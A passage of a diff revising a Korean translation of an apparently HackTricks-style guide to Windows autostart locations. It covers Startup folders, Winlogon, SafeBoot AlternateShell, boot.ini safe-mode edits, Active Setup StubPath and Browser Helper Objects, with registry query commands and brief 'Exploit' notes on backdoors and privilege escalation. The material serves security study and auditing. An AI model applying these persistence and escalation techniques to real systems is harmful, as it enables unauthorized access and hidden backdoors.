์žˆ์œผ๋ฉฐ, ์‚ฌ์šฉ์ž๊ฐ€ ์‹œ์Šคํ…œ์— ๋กœ๊ทธ์ธํ•  ๋•Œ๋งˆ๋‹ค ์‹คํ–‰๋˜๋Š” ๋ฐฑ๋„์–ด๋ฅผ ๋ฐฐ์น˜ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ```bash reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup" reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup" @@ -169,8 +179,8 @@ reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Userinit" Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Shell" ``` -> [!NOTE] -> ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ๊ฐ’์„ ๋ฎ์–ด์“ฐ๊ฑฐ๋‚˜ ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฅผ ๋ฎ์–ด์“ธ ์ˆ˜ ์žˆ๋‹ค๋ฉด ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +> [!TIP] +> ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ๊ฐ’์„ ๋ฎ์–ด์“ฐ๊ฑฐ๋‚˜ ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฅผ ๋ฎ์–ด์“ธ ์ˆ˜ ์žˆ๋‹ค๋ฉด ๊ถŒํ•œ ์ƒ์Šน์ด ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค. ### ์ •์ฑ… ์„ค์ • @@ -188,19 +198,19 @@ Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion ### ์•ˆ์ „ ๋ชจ๋“œ ๋ช…๋ น ํ”„๋กฌํ”„ํŠธ ๋ณ€๊ฒฝ -Windows ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์˜ `HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot` ์•„๋ž˜์— ๊ธฐ๋ณธ์ ์œผ๋กœ `cmd.exe`๋กœ ์„ค์ •๋œ **`AlternateShell`** ๊ฐ’์ด ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” ์‹œ์ž‘ ์‹œ "๋ช…๋ น ํ”„๋กฌํ”„ํŠธ๊ฐ€ ์žˆ๋Š” ์•ˆ์ „ ๋ชจ๋“œ"๋ฅผ ์„ ํƒํ•  ๋•Œ (F8์„ ๋ˆŒ๋Ÿฌ์„œ) `cmd.exe`๊ฐ€ ์‚ฌ์šฉ๋œ๋‹ค๋Š” ๊ฒƒ์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ F8์„ ๋ˆŒ๋Ÿฌ ์ˆ˜๋™์œผ๋กœ ์„ ํƒํ•˜์ง€ ์•Š๊ณ ๋„ ์ด ๋ชจ๋“œ์—์„œ ์ž๋™์œผ๋กœ ์‹œ์ž‘ํ•˜๋„๋ก ์ปดํ“จํ„ฐ๋ฅผ ์„ค์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +Windows ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์˜ `HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot` ์•„๋ž˜์— ๊ธฐ๋ณธ์ ์œผ๋กœ `cmd.exe`๋กœ ์„ค์ •๋œ **`AlternateShell`** ๊ฐ’์ด ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” ์‹œ์ž‘ ์‹œ "๋ช…๋ น ํ”„๋กฌํ”„ํŠธ๊ฐ€ ์žˆ๋Š” ์•ˆ์ „ ๋ชจ๋“œ"๋ฅผ ์„ ํƒํ•  ๋•Œ (F8์„ ๋ˆŒ๋Ÿฌ์„œ) `cmd.exe`๊ฐ€ ์‚ฌ์šฉ๋œ๋‹ค๋Š” ๊ฒƒ์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ F8์„ ๋ˆ„๋ฅด๊ณ  ์ˆ˜๋™์œผ๋กœ ์„ ํƒํ•  ํ•„์š” ์—†์ด ์ด ๋ชจ๋“œ์—์„œ ์ž๋™์œผ๋กœ ์‹œ์ž‘ํ•˜๋„๋ก ์ปดํ“จํ„ฐ๋ฅผ ์„ค์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. "๋ช…๋ น ํ”„๋กฌํ”„ํŠธ๊ฐ€ ์žˆ๋Š” ์•ˆ์ „ ๋ชจ๋“œ"์—์„œ ์ž๋™์œผ๋กœ ์‹œ์ž‘ํ•˜๋Š” ๋ถ€ํŒ… ์˜ต์…˜์„ ๋งŒ๋“ค๊ธฐ ์œ„ํ•œ ๋‹จ๊ณ„: 1. `boot.ini` ํŒŒ์ผ์˜ ์†์„ฑ์„ ๋ณ€๊ฒฝํ•˜์—ฌ ์ฝ๊ธฐ ์ „์šฉ, ์‹œ์Šคํ…œ ๋ฐ ์ˆจ๊น€ ํ”Œ๋ž˜๊ทธ๋ฅผ ์ œ๊ฑฐํ•ฉ๋‹ˆ๋‹ค: `attrib c:\boot.ini -r -s -h` -2. `boot.ini`๋ฅผ ํŽธ์ง‘์„ ์œ„ํ•ด ์—ฝ๋‹ˆ๋‹ค. +2. ํŽธ์ง‘์„ ์œ„ํ•ด `boot.ini`๋ฅผ ์—ฝ๋‹ˆ๋‹ค. 3. ๋‹ค์Œ๊ณผ ๊ฐ™์€ ์ค„์„ ์‚ฝ์ž…ํ•ฉ๋‹ˆ๋‹ค: `multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /SAFEBOOT:MINIMAL(ALTERNATESHELL)` 4. `boot.ini`์— ๋Œ€ํ•œ ๋ณ€๊ฒฝ ์‚ฌํ•ญ์„ ์ €์žฅํ•ฉ๋‹ˆ๋‹ค. 5. ์›๋ž˜ ํŒŒ์ผ ์†์„ฑ์„ ๋‹ค์‹œ ์ ์šฉํ•ฉ๋‹ˆ๋‹ค: `attrib c:\boot.ini +r +s +h` - **Exploit 1:** **AlternateShell** ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ‚ค๋ฅผ ๋ณ€๊ฒฝํ•˜๋ฉด ์‚ฌ์šฉ์ž ์ •์˜ ๋ช…๋ น ์…ธ ์„ค์ •์ด ๊ฐ€๋Šฅํ•ด์ ธ, ๋ฌด๋‹จ ์ ‘๊ทผ์ด ๋ฐœ์ƒํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. - **Exploit 2 (PATH ์“ฐ๊ธฐ ๊ถŒํ•œ):** ์‹œ์Šคํ…œ **PATH** ๋ณ€์ˆ˜์˜ ์–ด๋–ค ๋ถ€๋ถ„์—๋“  ์“ฐ๊ธฐ ๊ถŒํ•œ์ด ์žˆ๋Š” ๊ฒฝ์šฐ, ํŠนํžˆ `C:\Windows\system32` ์ด์ „์—, ์‚ฌ์šฉ์ž ์ •์˜ `cmd.exe`๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์ด๋Š” ์‹œ์Šคํ…œ์ด ์•ˆ์ „ ๋ชจ๋“œ์—์„œ ์‹œ์ž‘๋  ๊ฒฝ์šฐ ๋ฐฑ๋„์–ด๊ฐ€ ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -- **Exploit 3 (PATH ๋ฐ boot.ini ์“ฐ๊ธฐ ๊ถŒํ•œ):** `boot.ini`์— ๋Œ€ํ•œ ์“ฐ๊ธฐ ์ ‘๊ทผ์€ ์ž๋™ ์•ˆ์ „ ๋ชจ๋“œ ์‹œ์ž‘์„ ๊ฐ€๋Šฅํ•˜๊ฒŒ ํ•˜์—ฌ, ๋‹ค์Œ ์žฌ๋ถ€ํŒ… ์‹œ ๋ฌด๋‹จ ์ ‘๊ทผ์„ ์šฉ์ดํ•˜๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. +- **Exploit 3 (PATH ๋ฐ boot.ini ์“ฐ๊ธฐ ๊ถŒํ•œ):** `boot.ini`์— ๋Œ€ํ•œ ์“ฐ๊ธฐ ์ ‘๊ทผ์ด ๊ฐ€๋Šฅํ•˜๋ฉด ์ž๋™ ์•ˆ์ „ ๋ชจ๋“œ ์‹œ์ž‘์ด ๊ฐ€๋Šฅํ•ด์ ธ, ๋‹ค์Œ ์žฌ๋ถ€ํŒ… ์‹œ ๋ฌด๋‹จ ์ ‘๊ทผ์„ ์šฉ์ดํ•˜๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. ํ˜„์žฌ **AlternateShell** ์„ค์ •์„ ํ™•์ธํ•˜๋ ค๋ฉด ๋‹ค์Œ ๋ช…๋ น์„ ์‚ฌ์šฉํ•˜์‹ญ์‹œ์˜ค: ```bash @@ -209,7 +219,7 @@ Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Co ``` ### ์„ค์น˜๋œ ๊ตฌ์„ฑ ์š”์†Œ -Active Setup์€ Windows์˜ ๊ธฐ๋Šฅ์œผ๋กœ **๋ฐ”ํƒ• ํ™”๋ฉด ํ™˜๊ฒฝ์ด ์™„์ „ํžˆ ๋กœ๋“œ๋˜๊ธฐ ์ „์— ์‹œ์ž‘๋ฉ๋‹ˆ๋‹ค**. ์ด๋Š” ํŠน์ • ๋ช…๋ น์˜ ์‹คํ–‰์„ ์šฐ์„ ์‹œํ•˜๋ฉฐ, ์‚ฌ์šฉ์ž๊ฐ€ ๋กœ๊ทธ์˜จ์„ ์ง„ํ–‰ํ•˜๊ธฐ ์ „์— ์™„๋ฃŒ๋˜์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ์ด ๊ณผ์ •์€ Run ๋˜๋Š” RunOnce ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ์„น์…˜์˜ ๋‹ค๋ฅธ ์‹œ์ž‘ ํ•ญ๋ชฉ์ด ํŠธ๋ฆฌ๊ฑฐ๋˜๊ธฐ ์ „์—๋„ ๋ฐœ์ƒํ•ฉ๋‹ˆ๋‹ค. +Active Setup์€ Windows์˜ ๊ธฐ๋Šฅ์œผ๋กœ **๋ฐ”ํƒ• ํ™”๋ฉด ํ™˜๊ฒฝ์ด ์™„์ „ํžˆ ๋กœ๋“œ๋˜๊ธฐ ์ „์— ์‹œ์ž‘๋ฉ๋‹ˆ๋‹ค**. ์ด๋Š” ํŠน์ • ๋ช…๋ น์˜ ์‹คํ–‰์„ ์šฐ์„ ์‹œํ•˜๋ฉฐ, ์‚ฌ์šฉ์ž๊ฐ€ ๋กœ๊ทธ์˜จ์„ ์ง„ํ–‰ํ•˜๊ธฐ ์ „์— ์™„๋ฃŒ๋˜์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ์ด ๊ณผ์ •์€ Run ๋˜๋Š” RunOnce ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ์„น์…˜๊ณผ ๊ฐ™์€ ๋‹ค๋ฅธ ์‹œ์ž‘ ํ•ญ๋ชฉ์ด ํŠธ๋ฆฌ๊ฑฐ๋˜๊ธฐ ์ „์—๋„ ๋ฐœ์ƒํ•ฉ๋‹ˆ๋‹ค. Active Setup์€ ๋‹ค์Œ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ‚ค๋ฅผ ํ†ตํ•ด ๊ด€๋ฆฌ๋ฉ๋‹ˆ๋‹ค: @@ -227,8 +237,8 @@ Active Setup์€ ๋‹ค์Œ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ‚ค๋ฅผ ํ†ตํ•ด ๊ด€๋ฆฌ๋ฉ๋‹ˆ๋‹ค: **๋ณด์•ˆ ํ†ต์ฐฐ๋ ฅ:** -- **`IsInstalled`**๊ฐ€ `"1"`๋กœ ์„ค์ •๋œ ํ‚ค๋ฅผ ํŠน์ • **`StubPath`**๋กœ ์ˆ˜์ •ํ•˜๊ฑฐ๋‚˜ ์ž‘์„ฑํ•˜๋ฉด ๋ฌด๋‹จ ๋ช…๋ น ์‹คํ–‰์œผ๋กœ ์ด์–ด์งˆ ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์ด๋Š” ๊ถŒํ•œ ์ƒ์Šน์„ ์ดˆ๋ž˜ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -- ์–ด๋–ค **`StubPath`** ๊ฐ’์—์„œ ์ฐธ์กฐ๋œ ์ด์ง„ ํŒŒ์ผ์„ ๋ณ€๊ฒฝํ•˜๋Š” ๊ฒƒ๋„ ์ถฉ๋ถ„ํ•œ ๊ถŒํ•œ์ด ์žˆ์„ ๊ฒฝ์šฐ ๊ถŒํ•œ ์ƒ์Šน์„ ๋‹ฌ์„ฑํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +- **`IsInstalled`**๊ฐ€ `"1"`๋กœ ์„ค์ •๋œ ํ‚ค๋ฅผ ํŠน์ • **`StubPath`**๋กœ ์ˆ˜์ •ํ•˜๊ฑฐ๋‚˜ ์“ฐ๋Š” ๊ฒƒ์€ ๊ถŒํ•œ ์ƒ์Šน์„ ์œ„ํ•œ ๋ฌด๋‹จ ๋ช…๋ น ์‹คํ–‰์œผ๋กœ ์ด์–ด์งˆ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +- ์–ด๋–ค **`StubPath`** ๊ฐ’์—์„œ ์ฐธ์กฐ๋œ ์ด์ง„ ํŒŒ์ผ์„ ๋ณ€๊ฒฝํ•˜๋Š” ๊ฒƒ๋„ ์ถฉ๋ถ„ํ•œ ๊ถŒํ•œ์ด ์ฃผ์–ด์ง€๋ฉด ๊ถŒํ•œ ์ƒ์Šน์„ ๋‹ฌ์„ฑํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. Active Setup ๊ตฌ์„ฑ ์š”์†Œ ์ „๋ฐ˜์— ๊ฑธ์ณ **`StubPath`** ๊ตฌ์„ฑ์„ ๊ฒ€์‚ฌํ•˜๊ธฐ ์œ„ํ•ด ๋‹ค์Œ ๋ช…๋ น์„ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: ```bash @@ -237,11 +247,11 @@ reg query "HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v Stub reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath reg query "HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath ``` -### ๋ธŒ๋ผ์šฐ์ € ํ—ฌํผ ์˜ค๋ธŒ์ ํŠธ +### Browser Helper Objects -### ๋ธŒ๋ผ์šฐ์ € ํ—ฌํผ ์˜ค๋ธŒ์ ํŠธ(BHOs) ๊ฐœ์š” +### Overview of Browser Helper Objects (BHOs) -๋ธŒ๋ผ์šฐ์ € ํ—ฌํผ ์˜ค๋ธŒ์ ํŠธ(BHOs)๋Š” Microsoft์˜ Internet Explorer์— ์ถ”๊ฐ€ ๊ธฐ๋Šฅ์„ ์ œ๊ณตํ•˜๋Š” DLL ๋ชจ๋“ˆ์ž…๋‹ˆ๋‹ค. ์ด๋“ค์€ ๊ฐ ์‹œ์ž‘ ์‹œ Internet Explorer์™€ Windows Explorer์— ๋กœ๋“œ๋ฉ๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ **NoExplorer** ํ‚ค๋ฅผ 1๋กœ ์„ค์ •ํ•˜๋ฉด ์‹คํ–‰์ด ์ฐจ๋‹จ๋˜์–ด Windows Explorer ์ธ์Šคํ„ด์Šค์™€ ํ•จ๊ป˜ ๋กœ๋“œ๋˜์ง€ ์•Š๋„๋ก ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +Browser Helper Objects (BHOs)๋Š” Microsoft์˜ Internet Explorer์— ์ถ”๊ฐ€ ๊ธฐ๋Šฅ์„ ์ œ๊ณตํ•˜๋Š” DLL ๋ชจ๋“ˆ์ž…๋‹ˆ๋‹ค. ์ด๋“ค์€ ๊ฐ ์‹œ์ž‘ ์‹œ Internet Explorer์™€ Windows Explorer์— ๋กœ๋“œ๋ฉ๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ **NoExplorer** ํ‚ค๋ฅผ 1๋กœ ์„ค์ •ํ•˜๋ฉด ์‹คํ–‰์ด ์ฐจ๋‹จ๋˜์–ด Windows Explorer ์ธ์Šคํ„ด์Šค์™€ ํ•จ๊ป˜ ๋กœ๋“œ๋˜์ง€ ์•Š๋„๋ก ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. BHOs๋Š” Internet Explorer 11์„ ํ†ตํ•ด Windows 10๊ณผ ํ˜ธํ™˜๋˜์ง€๋งŒ, ์ตœ์‹  ๋ฒ„์ „์˜ Windows์—์„œ ๊ธฐ๋ณธ ๋ธŒ๋ผ์šฐ์ €์ธ Microsoft Edge์—์„œ๋Š” ์ง€์›๋˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค. @@ -291,7 +301,7 @@ HKLM\Software\Microsoft\Wow6432Node\Windows NT\CurrentVersion\Image File Executi ``` ## SysInternals -autoruns๋ฅผ ์ฐพ์„ ์ˆ˜ ์žˆ๋Š” ๋ชจ๋“  ์‚ฌ์ดํŠธ๋Š” **์ด๋ฏธ** [**winpeas.exe**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe)๋กœ ๊ฒ€์ƒ‰๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ **์ž๋™ ์‹คํ–‰๋˜๋Š”** ํŒŒ์ผ์˜ **๋” ํฌ๊ด„์ ์ธ ๋ชฉ๋ก**์„ ์›ํ•œ๋‹ค๋ฉด Sysinternals์˜ [autoruns](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns)๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: +๋ชจ๋“  autoruns๋ฅผ ์ฐพ์„ ์ˆ˜ ์žˆ๋Š” ์‚ฌ์ดํŠธ๋Š” **์ด๋ฏธ**[ **winpeas.exe**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe)๋กœ ๊ฒ€์ƒ‰๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ **๋” ํฌ๊ด„์ ์ธ ์ž๋™ ์‹คํ–‰** ํŒŒ์ผ ๋ชฉ๋ก์„ ์›ํ•˜์‹ ๋‹ค๋ฉด Sysinternals์˜ [autoruns](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns)๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: ``` autorunsc.exe -m -nobanner -a * -ct /accepteula ```